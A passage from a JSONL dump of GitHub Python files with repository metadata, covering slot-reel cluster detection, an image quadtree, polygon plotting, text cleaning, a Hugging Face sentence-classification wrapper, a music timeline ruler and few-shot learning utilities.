This will track\n # which cells we've already visited.\n visited = np.zeros(reel.shape, dtype=bool)\n\n clusters = [] # Initialize the list of clusters to empty.\n\n # For each cell in the reel:\n for i in range(reel.shape[0]):\n for j in range(reel.shape[1]):\n # If we haven't visited this cell yet:\n if not visited[i, j]:\n # Calculate the cluster starting from this cell, and if it's a winning cluster\n # (i.e., has 4 or more cells), add it to our list of clusters.\n cluster = get_cluster(reel, visited, i, j)\n if len(cluster) >= 4:\n clusters.append(cluster)\n return clusters\n\n\ndef get_cluster(reel, visited, i, j):\n symbol = reel[i, j] # The symbol in the current cell.\n cluster = [(i, j)] # Start with just the current cell itself.\n stack = [(i, j)] # Start with the current cell.\n bonus_stack = [] # Stack to hold bonus symbols for processing\n\n # Mark the initial cell as visited.\n visited[i, j] = True\n\n while stack or bonus_stack: # While there are still cells to visit:\n if stack:\n x, y = stack.pop() # Pop a cell from the stack.\n else:\n x, y = bonus_stack.pop() # If the main stack is empty, pop a cell from the bonus stack instead.\n\n # For each of the cell's four neighbors:\n for dx, dy in [(-1, 0), (0, 1), (1, 0), (0, -1)]:\n nx, ny = x + dx, y + dy\n\n # If the neighbor is within the grid, has the same symbol as the current cell,\n # is a bonus symbol, and hasn't been visited yet:\n if (0 <= nx < reel.shape[0] and 0 <= ny < reel.shape[1] and\n (reel[nx, ny] == symbol or reel[nx, ny] == bonus_symbol) and \n not visited[nx, ny]):\n\n # Mark it as visited and add it to the cluster.\n visited[nx, ny] = True\n cluster.append((nx, ny))\n\n # If it's a bonus symbol, add it to the bonus stack. \n # Otherwise, add it to the normal stack.\n if reel[nx, ny] == bonus_symbol:\n bonus_stack.append((nx, ny))\n else:\n stack.append((nx, ny))\n\n return cluster\n\n\n\n\n\n# Function to calculate win based on clusters\n\n\nplay_round()\n","repo_name":"Fishcuit/AhluicSim","sub_path":"oldDfsSims/sim2.py","file_name":"sim2.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26490472528","text":"#!/usr/bin/env python3\nfrom node import Node\n\nimport logging\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nclass Quadtree:\n \"\"\"\n Quadtree defined by its root and # of levels in it\n Root at level 0\n \"\"\"\n def __init__(self, image, nlevels):\n self.image = image\n self.rows, self.cols, _ = self.image.shape\n self.root = Node(0, 0, self.rows, self.cols, self.image, 0)\n self.nlevels = nlevels\n\n # bfs traversal to construct tree by level going downward\n self.fifo = []\n self.ramify()\n\n def ramify(self):\n \"\"\"\n Create quadtree by ramification (i.e. 
cut image into four quadrants)\n Based on BFS traversal to build level i before level i+1 (using a fifo)\n param parent Parent node (modified in place)\n \"\"\"\n self.fifo.insert(0, self.root)\n\n while len(self.fifo) > 0:\n parent = self.fifo.pop()\n\n # stop condition\n if parent.level == self.nlevels:\n break\n\n # nrows and ncols can be odd\n nrows_child0 = parent.nrows // 2\n nrows_child1 = parent.nrows - nrows_child0\n ncols_child0 = parent.ncols // 2\n ncols_child1 = parent.ncols - ncols_child0\n logger.info('({}, {}, {}, {})'.format(nrows_child0, nrows_child1, ncols_child0, ncols_child1))\n\n # quadrants subsets of size = 0\n if nrows_child0 == 0 or nrows_child1 == 0 or ncols_child0 == 0 or ncols_child1 == 0:\n break\n\n # child at north-west\n row = parent.row\n col = parent.col\n nrows = nrows_child0\n ncols = ncols_child0\n image = self.image[row:row+nrows, col:col+ncols]\n child00 = Node(row, col, nrows, ncols, image, parent.level + 1)\n\n # child at north-east\n row = parent.row\n col = parent.col + ncols_child0\n nrows = nrows_child0\n ncols = ncols_child1\n image = self.image[row:row+nrows, col:col+ncols]\n child01 = Node(row, col, nrows, ncols, image, parent.level + 1)\n\n # child at south-west\n row = parent.row + nrows_child0\n col = parent.col\n nrows = nrows_child1\n ncols = ncols_child0\n image = self.image[row:row+nrows, col:col+ncols]\n child10 = Node(row, col, nrows, ncols, image, parent.level + 1)\n\n # child at south-east\n row = parent.row + nrows_child0\n col = parent.col + ncols_child0\n nrows = nrows_child1\n ncols = ncols_child1\n image = self.image[row:row+nrows, col:col+ncols]\n child11 = Node(row, col, nrows, ncols, image, parent.level + 1)\n\n # push into fifo four children to further subdivide them in next iterations\n parent.children = [child00, child01, child10, child11]\n self.fifo.insert(0, child00)\n self.fifo.insert(0, child01)\n self.fifo.insert(0, child10)\n self.fifo.insert(0, child11)\n\n def traverse(self, node, level, nodes):\n \"\"\"\n Recursive DFS traversal to find quadtree nodes at given level\n return nodes List of nodes at given level\n # of nodes @ level l = 4**l\n \"\"\"\n if level > self.nlevels:\n logger.error('Traverse: level cannot be bigger than nlevels')\n return\n\n if node.level == level:\n nodes.append(node)\n return\n\n for child in node.children:\n self.traverse(child, level, nodes)\n\n def concat(self, node, level):\n \"\"\"\n Recursive concatenation to reconstruct initial image\n @param level Requested level\n \"\"\"\n if level > self.nlevels:\n logger.error('Concat: level cannot be bigger than nlevels')\n return\n\n # stop condition\n children = node.children\n if node.level == level or len(children) == 0:\n return node.image\n\n return [\n [concat(children[0], level), concat(children[1], level)],\n [concat(children[2], level), concat(children[3], level)],\n ]\n","repo_name":"h4k1m0u/image-quadtrees","sub_path":"src/quadtree.py","file_name":"quadtree.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4916529956","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.patches import Polygon,Circle\r\nfrom matplotlib.collections import PatchCollection\r\nimport matplotlib\r\nimport operator\r\nfrom functools import reduce \r\nimport matplotlib.colors as mpc\r\nimport matplotlib.cm as cm\r\n\r\ndef Polygon_collec():\r\n '''\r\n Creating Polygon for meshing the grid\r\n and visualization of 
Cp_interp data\r\n '''\r\n \r\n r = (np.array([1.4, 1.2, 1.0,0.8, 0.7, 0.6, 0.5, 0.4, 0.3, \r\n 0.25, 0.2, 0.15, 0.10, 0.075, 0.05, 0.025, 0]))\r\n \r\n rr = np.dot((np.add(r[0:16],r[1:17])),0.5)\r\n rr = np.insert(rr,0,1.5)\r\n \r\n theta = np.dot(np.arange(33),2*np.pi/32)\r\n \r\n patches = []\r\n x_cor = []\r\n y_cor = []\r\n \r\n for i in range(32):\r\n \r\n Poly_th = theta[i:i+2].reshape(1,-1)\r\n \r\n for j in range(16):\r\n x_cor.append(np.dot(rr[j],np.cos(theta[i])))\r\n y_cor.append(np.dot(rr[j],np.sin(theta[i])))\r\n \r\n Poly_r = rr[j:j+2].reshape(-1,1)\r\n Poly_x = np.multiply(Poly_r,np.cos(Poly_th))\r\n Poly_y = np.multiply(Poly_r,np.sin(Poly_th))\r\n Poly_x = reduce(operator.add,Poly_x.tolist()) \r\n Poly_y = reduce(operator.add,Poly_y.tolist())\r\n \r\n Verts= list(zip(Poly_x,Poly_y)) \r\n Verts[2], Verts[3] = Verts[3], Verts[2] \r\n \r\n polygon = Polygon(Verts,closed=True)\r\n patches.append(polygon)\r\n \r\n x_cor.append(0) \r\n y_cor.append(0)\r\n \r\n circle = Circle((0, 0), rr.min())\r\n patches.append(circle) \r\n collection = PatchCollection(patches)\r\n \r\n return collection\r\n\r\ndef Plot_press(p, color_list=['blue','white','red'],txt=False,num=1\r\n ,save_fig = False,update=True,cbar = False):\r\n '''\r\n p is 1D array. \r\n Here it is (513,)\r\n '''\r\n \r\n collection = Polygon_collec() # Importing Polygons\r\n \r\n cc = mpc.LinearSegmentedColormap.from_list(\"\",color_list,N=125)\r\n \r\n m = 0.8* np.max(np.abs(p)) # Set colorbar range\r\n# minima = p.min()\r\n# maxima = p.max()\r\n \r\n norm = matplotlib.colors.Normalize(vmin=-m, \r\n vmax= m, clip=False)\r\n \r\n mapper = cm.ScalarMappable(norm=norm, cmap=cc)\r\n \r\n colors = mapper.to_rgba(p) # Mapping values of p data to color\r\n \r\n \r\n fig = plt.figure(num)\r\n ax = plt.gca()\r\n ax.add_collection(collection) # Adding Polygongs\r\n \r\n collection.set_facecolor(colors)\r\n collection.set_edgecolor('black')\r\n collection.set_linewidth(0.25)\r\n \r\n plt.axis('scaled')\r\n ax.set_xlim(-0.9,0.9)\r\n ax.set_ylim(-0.9,0.9) \r\n plt.xticks([], [])\r\n plt.yticks([], [])\r\n \r\n if txt:\r\n ax.text(0.74,-0.82, r'$\\phi_%i$' %num, fontsize=15,\r\n bbox=dict(facecolor='white'))\r\n if cbar:\r\n mapper.set_array([]) \r\n fig.colorbar(mapper, ax = ax)\r\n \r\n if save_fig:\r\n fig.savefig('PCA%i.png' %num) \r\n \r\n plt.show() \r\n\r\n\r\n","repo_name":"Mkarami3/Pattern_recognition_dynamic_PCA_ICA","sub_path":"visual.py","file_name":"visual.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"30075215107","text":"## Jocelyn Huang\n## 10/29/2013\n## Remove Punctuation from String\nimport string\n\ndef removePunctuation(s):\n if not isinstance(s, str): return None\n s = s.replace(\"-\", \" \")\n s = s.replace(\".\", \" \")\n s = s.replace(\"/\", \" \")\n #if('\"' in s): #--> delete the words in between?s\n # print(\"hey\")\n removal = {ord(char): None for char in string.punctuation}\n s = s.translate(removal).lower()\n return s","repo_name":"redoctopus/Sentiment-Analysis-Book-Reviews-2014","sub_path":"RemovePunctuation.py","file_name":"RemovePunctuation.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73949514026","text":"company=dict()\nx=1\nb=[]\nwhile x<=5:\n name=input(\"enter your name:\")\n salary=int(input(\"enter your salary:\"))\n company[name]=salary\n 
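The small interactive record begun above collects five name-to-salary pairs and then keeps the three largest values. The same ranking can be written with heapq.nlargest, which avoids sorting the whole value list; this is a standalone sketch with invented sample data, not part of the original file.

import heapq

# Invented data standing in for the five interactively entered pairs.
company = {"ann": 90, "bob": 70, "cho": 80, "dee": 60, "eve": 85}

# Three largest salaries without sorting every value.
biggest_salaries = heapq.nlargest(3, company.values())

# Same membership test as the original loop over company.items().
for name, salary in company.items():
    if salary in biggest_salaries:
        print(name)  # prints ann, cho, eve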
x+=1\nbiggest_salaries=sorted(company.values())[-3:]\nfor i,y in company.items():\n if y in biggest_salaries:\n print(i)\n","repo_name":"k23040198/270201041","sub_path":"lab7/example3.py","file_name":"example3.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20648844380","text":"import copy\n\nimport torch\nfrom torch.nn.functional import pad\nfrom transformers import PretrainedConfig, PreTrainedModel\nfrom transformers import AutoConfig, AutoModel, AutoModelForTokenClassification\n\n\nclass ModelForSentencesClassificationConfig(PretrainedConfig):\n model_type = \"model-for-sentences-classification\"\n is_composition = True\n\n def __init__(self, tokens_model_config, sentences_model_config, **kwargs):\n super().__init__(**kwargs)\n\n tokens_model_type = tokens_model_config.pop(\"model_type\")\n sentences_model_type = sentences_model_config.pop(\"model_type\")\n\n self.tokens_model_config = AutoConfig.for_model(tokens_model_type, **tokens_model_config)\n self.sentences_model_config = AutoConfig.for_model(sentences_model_type, **sentences_model_config)\n\n @classmethod\n def from_configs(cls, tokens_model_config, sentences_model_config, **kwargs):\n return cls(\n tokens_model_config=tokens_model_config.to_dict(),\n sentences_model_config=sentences_model_config.to_dict(),\n **kwargs\n )\n\n def to_dict(self):\n output = copy.deepcopy(self.__dict__)\n output[\"tokens_model_config\"] = self.tokens_model_config.to_dict()\n output[\"sentences_model_config\"] = self.sentences_model_config.to_dict()\n output[\"model_type\"] = self.__class__.model_type\n return output\n\nAutoConfig.register(\"model-for-sentences-classification\", ModelForSentencesClassificationConfig)\n\nclass ModelForSentencesClassification(PreTrainedModel):\n config_class = ModelForSentencesClassificationConfig\n base_model_prefix = \"model_for_sentences_classification\"\n\n def __init__(\n self,\n config=None,\n tokens_model=None,\n sentences_model=None\n ):\n assert config is not None or (\n tokens_model is not None and sentences_model is not None\n ), \"Either a configuration or both models has to be provided\"\n if config is None:\n config = ModelForSentencesClassificationConfig.from_configs(\n tokens_model.config, sentences_model.config\n )\n super().__init__(config)\n\n if tokens_model is None:\n tokens_model = AutoModel.from_config(config.tokens_model_config)\n if sentences_model is None:\n sentences_model = AutoModelForTokenClassification.from_config(config.sentences_model_config)\n\n self.tokens_model = tokens_model\n self.sentences_model = sentences_model\n self.tokens_model.config = self.config.tokens_model_config\n self.sentences_model.config = self.config.sentences_model_config\n\n def forward(\n self,\n input_ids=None,\n attention_mask=None,\n token_type_ids=None,\n labels=None\n ):\n assert self.config.sep_token_id >= 0\n assert self.config.max_sentences_count > 0\n\n batch_size = input_ids.size(0)\n sep_token_id = self.config.sep_token_id\n max_sentences_count = self.config.max_sentences_count\n\n sep_indices = input_ids.new_zeros((batch_size, max_sentences_count))\n for i, sample_ids in enumerate(input_ids):\n ids = (sample_ids == sep_token_id).nonzero().squeeze(1)\n ids = ids[:max_sentences_count]\n sep_indices[i, :ids.size(0)] = ids\n mask_sep = (sep_indices != 0).long()\n\n outputs = self.tokens_model(\n input_ids=input_ids,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n 
return_dict=True\n )\n last_hidden_state = outputs.last_hidden_state\n sentences_states = last_hidden_state[torch.arange(batch_size).unsqueeze(1), sep_indices]\n sentences_states = sentences_states * mask_sep[:, :, None].float()\n\n outputs = self.sentences_model(\n inputs_embeds=sentences_states,\n attention_mask=mask_sep,\n labels=labels\n )\n return outputs\n\n @classmethod\n def from_parts_pretrained(cls, tokens_model_name, sentences_model_config):\n tokens_model = AutoModel.from_pretrained(tokens_model_name)\n config = ModelForSentencesClassificationConfig.from_configs(tokens_model.config, sentences_model_config)\n return cls(tokens_model=tokens_model, config=config)\n\n @classmethod\n def from_pretrained(cls, *args, **kwargs):\n kwargs[\"_fast_init\"] = False\n return super().from_pretrained(*args, **kwargs)\n","repo_name":"IlyaGusev/summarus","sub_path":"external/hf_scripts/extractive_model.py","file_name":"extractive_model.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"37"} +{"seq_id":"33293189386","text":"from musurgia.pdf.text import TextLabel\nfrom musurgia.timeline.abstractvoice import AbstractVoice\nfrom musurgia.timing import Timing\n\n\nclass Ruler(AbstractVoice):\n def __init__(self, show_interval=5, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._show_interval = None\n self.show_interval = show_interval\n\n @property\n def show_interval(self):\n return self._show_interval\n\n @show_interval.setter\n def show_interval(self, val):\n if not isinstance(val, int):\n raise TypeError('show_interval.value must be of type int not{}'.format(type(val)))\n self._show_interval = val\n self.update_show_intervals()\n\n def update_show_intervals(self):\n for index, line_segment in enumerate(self.line_segments):\n seconds = index\n line_segment.start_mark_line.remove_text_labels()\n if seconds % self.show_interval == 0:\n line_segment.start_mark_line.add_text_label(\n TextLabel(text=Timing.get_clock(seconds, mode='ms'), relative_y=-3, font_size=9))\n line_segment.start_mark_line.thickness = 4\n","repo_name":"alexgorji/musurgia","sub_path":"musurgia/timeline/ruler.py","file_name":"ruler.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2861122638","text":"import os\r\nimport time\r\nimport psutil\r\nimport pprint\r\nimport torch\r\n\r\nimport torch.nn.functional as F\r\nimport numpy as np\r\n\r\nfrom models.classification_heads import ClassificationHead\r\nfrom models.R2D2_embedding import R2D2Embedding\r\nfrom models.protonet_embedding import ProtoNetEmbedding\r\nfrom models.ResNet12_embedding import resnet12\r\n\r\nimport torchvision.transforms as transforms\r\n\r\ndef assert_folder(folder):\r\n import os\r\n if not os.path.exists(folder):\r\n f_path, f_name = os.path.split(folder)\r\n if len(f_path)>0:\r\n assert_folder(f_path)\r\n os.mkdir(folder)\r\n return folder\r\n\r\ndef set_gpu(x):\r\n if x != 'system_set':\r\n os.environ['CUDA_VISIBLE_DEVICES'] = str(x)\r\n else:\r\n x = os.environ['CUDA_VISIBLE_DEVICES']\r\n if x == '':\r\n x = os.environ['FULL_CUDA_VISIBLE_DEVICES']\r\n print('using gpu:', x)\r\n\r\ndef check_dir(path):\r\n '''\r\n Create directory if it does not exist.\r\n path: Path of directory.\r\n '''\r\n if not os.path.exists(path):\r\n os.mkdir(path)\r\n\r\ndef count_accuracy(logits, label):\r\n pred = torch.argmax(logits, dim=1).view(-1)\r\n label = 
label.view(-1)\r\n accuracy = 100 * pred.eq(label).float().mean()\r\n return accuracy\r\n\r\nclass Timer():\r\n def __init__(self):\r\n self.o = time.time()\r\n\r\n def measure(self, p=1):\r\n x = (time.time() - self.o) / float(p)\r\n x = int(x)\r\n if x >= 3600:\r\n return '{:.1f}h'.format(x / 3600)\r\n if x >= 60:\r\n return '{}m'.format(round(x / 60))\r\n return '{}s'.format(x)\r\n\r\ndef log(log_file_path, string):\r\n '''\r\n Write one line of log into screen and file.\r\n log_file_path: Path of log file.\r\n string: String to write in log file.\r\n '''\r\n with open(log_file_path, 'a+') as f:\r\n f.write(string + '\\n')\r\n f.flush()\r\n print(string)\r\n\r\ndef get_model(options):\r\n # Choose the embedding network\r\n if options.network == 'ProtoNet':\r\n network = ProtoNetEmbedding().cuda()\r\n elif options.network == 'R2D2':\r\n network = R2D2Embedding().cuda()\r\n elif options.network == 'ResNet':\r\n if options.dataset == 'miniImageNet' or options.dataset == 'tieredImageNet':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=5).cuda()\r\n network = torch.nn.DataParallel(network) # , device_ids=[0, 1, 2, 3])\r\n else:\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2).cuda()\r\n elif options.network == 'ResNet_star':\r\n if options.dataset == 'miniImageNet' or options.dataset == 'tieredImageNet':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=5, strides=[2, 2, 2, 1],\r\n flatten=False).cuda()\r\n network = torch.nn.DataParallel(network) # , device_ids=[0, 1, 2, 3])\r\n elif options.dataset == 'cub':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2, strides=[2, 2, 2, 1],\r\n flatten=False).cuda()\r\n elif options.dataset == 'imagenet-loc' or options.dataset == 'imagenet-det' or options.dataset =='pascal_voc':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2, strides=[2, 2, 2, 1],\r\n flatten=False).cuda()\r\n network = torch.nn.DataParallel(network)\r\n else:\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2, strides=[2, 2, 1, 1],\r\n flatten=False).cuda()\r\n elif options.network == 'ResNet_star_hi':\r\n if options.dataset == 'imagenet-loc' or options.dataset == 'imagenet-det' or options.dataset =='pascal_voc':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2, strides=[2, 2, 2, 2],\r\n flatten=False).cuda()\r\n network = torch.nn.DataParallel(network)\r\n\r\n elif options.network == 'ResNet_star_2stage':\r\n networks = []\r\n for iNet in range(2):\r\n if options.dataset == 'miniImageNet' or options.dataset == 'tieredImageNet':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=5, strides=[2, 2, 2, 1],\r\n flatten=False).cuda()\r\n network = torch.nn.DataParallel(network) # , device_ids=[0, 1, 2, 3])\r\n elif options.dataset == 'cub':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2, strides=[2, 2, 2, 1],\r\n flatten=False).cuda()\r\n elif options.dataset == 'imagenet-loc' or options.dataset == 'imagenet-det'or options.dataset =='pascal_voc':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2, strides=[2, 2, 2, 1],\r\n flatten=False).cuda()\r\n network = torch.nn.DataParallel(network)\r\n else:\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2, strides=[2, 2, 1, 1], # there are multiple options here\r\n flatten=False).cuda()\r\n networks.append(network)\r\n network = networks\r\n\r\n elif options.network == 'ResNet_star_2stage_hi':\r\n networks = []\r\n 
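A quick numeric check of the count_accuracy helper defined just above: it takes the argmax over the class dimension and compares it element-wise with the labels. The tensors here are made up for illustration.

import torch

logits = torch.tensor([[2.0, 0.1],
                       [0.2, 1.5],
                       [3.0, 0.5]])
label = torch.tensor([0, 1, 1])

pred = torch.argmax(logits, dim=1).view(-1)              # tensor([0, 1, 0])
accuracy = 100 * pred.eq(label.view(-1)).float().mean()
print(accuracy.item())  # ~66.67: two of three predictions match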
for iNet in range(2):\r\n if options.dataset == 'miniImageNet' or options.dataset == 'tieredImageNet':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=5, strides=[2, 2, 2, 2],\r\n flatten=False).cuda()\r\n network = torch.nn.DataParallel(network) # , device_ids=[0, 1, 2, 3])\r\n elif options.dataset == 'cub':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2, strides=[2, 2, 2, 2],\r\n flatten=False).cuda()\r\n elif options.dataset == 'imagenet-loc' or options.dataset == 'imagenet-det' or options.dataset =='pascal_voc':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2, strides=[2, 2, 2, 2],\r\n flatten=False).cuda()\r\n network = torch.nn.DataParallel(network)\r\n else:\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2, strides=[2, 2, 1, 2], # there are multiple options here\r\n flatten=False).cuda()\r\n networks.append(network)\r\n network = networks\r\n else:\r\n print(\"Cannot recognize the network type\")\r\n assert (False)\r\n\r\n # Choose the classification head\r\n if options.head == 'ProtoNet':\r\n cls_head = ClassificationHead(base_learner='ProtoNet').cuda()\r\n if options.head == 'StarNet':\r\n cls_head = ClassificationHead(base_learner='StarNet', split_scales = bool(options.split_head_scales)).cuda()\r\n elif options.head == 'Ridge':\r\n cls_head = ClassificationHead(base_learner='Ridge').cuda()\r\n elif options.head == 'R2D2':\r\n cls_head = ClassificationHead(base_learner='R2D2').cuda()\r\n elif options.head == 'SVM':\r\n cls_head = ClassificationHead(base_learner='SVM-CS').cuda()\r\n else:\r\n print(\"Cannot recognize the dataset type\")\r\n assert (False)\r\n\r\n return (network, cls_head)\r\n\r\ndef print_memory_usage(log_file_path = None):\r\n process = psutil.Process(os.getpid())\r\n mem_usage_bytes = process.memory_info().rss\r\n gpu_mem_bytes = torch.cuda.memory_allocated()\r\n usage_str_cpu = 'CPU memory usage: {:.1f} GB / {:.1f} MB'.format(mem_usage_bytes / (1024 ** 3), mem_usage_bytes / (1024 ** 2))\r\n usage_str_gpu = 'GPU memory usage: {:.1f} GB / {:.1f} MB'.format(gpu_mem_bytes / (1024 ** 3), gpu_mem_bytes / (1024 ** 2))\r\n if log_file_path is None:\r\n print(usage_str_cpu)\r\n print(usage_str_gpu)\r\n else:\r\n log(log_file_path, usage_str_cpu)\r\n log(log_file_path, usage_str_gpu)\r\n\r\ndef one_hot(indices, depth):\r\n \"\"\"\r\n Returns a one-hot tensor.\r\n This is a PyTorch equivalent of Tensorflow's tf.one_hot.\r\n\r\n Parameters:\r\n indices: a (n_batch, m) Tensor or (m) Tensor.\r\n depth: a scalar. 
Represents the depth of the one hot dimension.\r\n Returns: a (n_batch, m, depth) Tensor or (m, depth) Tensor.\r\n \"\"\"\r\n\r\n encoded_indicies = torch.zeros(indices.size() + torch.Size([depth])).cuda()\r\n index = indices.view(indices.size() + torch.Size([1]))\r\n encoded_indicies = encoded_indicies.scatter_(1, index, 1)\r\n\r\n return encoded_indicies\r\n\r\ndef finetune(\r\n embedding_net, cls_head,\r\n data_support, labels_support, data_query, labels_query,\r\n opt,\r\n learning_rate, num_iters,\r\n head='StarNet', train_query=1, train_way=5, train_shot=1, episodes_per_batch = 1, eps = 0.1\r\n):\r\n if type(embedding_net) is list:\r\n # pGroups = [{'params': net.parameters()} for net in embedding_net]\r\n # optimizer = torch.optim.SGD(\r\n # pGroups + [{'params': cls_head.parameters()}],\r\n # lr=learning_rate, momentum=0.9, weight_decay=5e-4, nesterov=True\r\n # )\r\n pGroups = [{'params': net.parameters()} for net in embedding_net[1:]]\r\n optimizer = torch.optim.SGD(\r\n pGroups,\r\n lr=learning_rate, momentum=0.9, weight_decay=5e-4, nesterov=True\r\n )\r\n else:\r\n optimizer = torch.optim.SGD([{'params': embedding_net.parameters()},\r\n {'params': cls_head.parameters()}], lr=learning_rate, momentum=0.9, \\\r\n weight_decay=5e-4, nesterov=True)\r\n\r\n lambda_epoch = lambda e: 1.0 if e < 20 else 1.0\r\n\r\n lr_scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda_epoch, last_epoch=-1)\r\n\r\n # no need as we actually need the model in eval mode\r\n # # move to train mode\r\n # if type(embedding_net) is list:\r\n # for net in embedding_net:\r\n # net.train()\r\n # cls_head.train()\r\n # else:\r\n # _, _ = [x.train() for x in (embedding_net, cls_head)]\r\n\r\n # we set to eval mode to keep the batch norms fixed\r\n if type(embedding_net) is list:\r\n for net in embedding_net:\r\n net.eval()\r\n cls_head.eval()\r\n else:\r\n _, _ = [x.eval() for x in (embedding_net, cls_head)]\r\n\r\n train_accuracies = []\r\n train_losses = []\r\n train_accuracies_parts = []\r\n train_losses_parts = []\r\n\r\n for i in range(1, num_iters + 1):\r\n # Train on the training split\r\n lr_scheduler.step()\r\n\r\n if type(embedding_net) is list:\r\n embedding_net_st1 = embedding_net[0]\r\n embedding_net_st2 = embedding_net[1] # TODO: support more then one\r\n else:\r\n embedding_net_st1 = embedding_net\r\n embedding_net_st2 = None\r\n\r\n train_n_support = train_way * train_shot\r\n train_n_query = train_way * train_query\r\n\r\n emb_support = embedding_net_st1(data_support.reshape([-1] + list(data_support.shape[-3:])))\r\n if 'Star' in head:\r\n emb_support = emb_support.reshape(\r\n [episodes_per_batch, train_n_support] + list(emb_support.shape[-3:]))\r\n else:\r\n emb_support = emb_support.reshape(opt.episodes_per_batch, train_n_support, -1)\r\n\r\n emb_query = embedding_net_st1(data_query.reshape([-1] + list(data_query.shape[-3:])))\r\n if 'Star' in head:\r\n emb_query = emb_query.reshape([episodes_per_batch, train_n_query] + list(emb_query.shape[-3:]))\r\n else:\r\n emb_query = emb_query.reshape(episodes_per_batch, train_n_query, -1)\r\n\r\n s2_emb_support, s2_emb_query = None, None\r\n if embedding_net_st2 is not None:\r\n s2_emb_support = embedding_net_st2(data_support.reshape([-1] + list(data_support.shape[-3:])))\r\n if 'Star' in head:\r\n s2_emb_support = s2_emb_support.reshape(\r\n [episodes_per_batch, train_n_support] + list(s2_emb_support.shape[-3:]))\r\n else:\r\n s2_emb_support = s2_emb_support.reshape(episodes_per_batch, train_n_support, -1)\r\n\r\n s2_emb_query = 
embedding_net_st2(data_query.reshape([-1] + list(data_query.shape[-3:])))\r\n if 'Star' in head:\r\n s2_emb_query = s2_emb_query.reshape(\r\n [episodes_per_batch, train_n_query] + list(s2_emb_query.shape[-3:]))\r\n else:\r\n s2_emb_query = s2_emb_query.reshape(opt.episodes_per_batch, train_n_query, -1)\r\n\r\n logit_query = cls_head(emb_query, emb_support, labels_support, train_way, train_shot,\r\n s2_query=s2_emb_query, s2_support=s2_emb_support, opt=opt)\r\n\r\n if type(logit_query) is not list:\r\n logit_query = [logit_query]\r\n\r\n smoothed_one_hot = one_hot(labels_query.reshape(-1), train_way)\r\n smoothed_one_hot = smoothed_one_hot * (1 - eps) + (1 - smoothed_one_hot) * eps / (train_way - 1)\r\n\r\n loss = 0.0\r\n loss_parts = [0.0] * len(logit_query)\r\n for iQ, lq in enumerate(logit_query):\r\n log_prb = F.log_softmax(lq.reshape(-1, train_way), dim=1)\r\n loss_ = -(smoothed_one_hot * log_prb).sum(dim=1)\r\n loss_parts[iQ] = loss_.mean()\r\n loss += loss_parts[iQ]\r\n\r\n probs_query = [F.softmax(lq, dim=2) for lq in logit_query]\r\n logit_query = torch.stack(probs_query, dim=0).sum(dim=0) / float(len(logit_query))\r\n\r\n acc = count_accuracy(logit_query.reshape(-1, train_way), labels_query.reshape(-1))\r\n acc_parts = [\r\n count_accuracy(pq.reshape(-1, train_way), labels_query.reshape(-1))\r\n for pq in probs_query\r\n ]\r\n\r\n train_accuracies.append(acc.item())\r\n train_losses.append(loss.item())\r\n train_accuracies_parts.append([x.item() for x in acc_parts])\r\n train_losses_parts.append([x.item() for x in loss_parts])\r\n\r\n train_acc_avg = np.mean(np.array(train_accuracies))\r\n loss_avg = np.mean(np.array(train_losses))\r\n train_acc_avg_parts = np.mean(np.array(train_accuracies_parts), axis=0)\r\n loss_avg_parts = np.mean(np.array(train_losses_parts), axis=0)\r\n\r\n if False:\r\n print(\r\n 'Iter: [{}/{}]\\tLoss: {:.4f} ({:.4f}, {})\\tAccuracy: {:.2f}% ({:.2f}%, {})'.format(\r\n i, num_iters, loss_avg, loss.item(), loss_avg_parts, train_acc_avg, acc,\r\n train_acc_avg_parts)\r\n )\r\n\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n # # get back to test mode\r\n # if type(embedding_net) is list:\r\n # for net in embedding_net:\r\n # net.eval()\r\n # cls_head.eval()\r\n # else:\r\n # _, _ = [x.eval() for x in (embedding_net, cls_head)]\r\n\r\ndef convert_batch2vis(img_orig,mean_pix,std_pix):\r\n img = np.asarray(img_orig)\r\n img = img * std_pix.reshape(3, 1, 1)\r\n img = img + mean_pix.reshape(3, 1, 1)\r\n img = img[[2, 1, 0], :, :]\r\n img = img.astype(np.uint8)\r\n img = img.transpose([1, 2, 0])\r\n return img\r\n\r\ndef convert_vis2batch(img,mean_pix,std_pix):\r\n normalize = 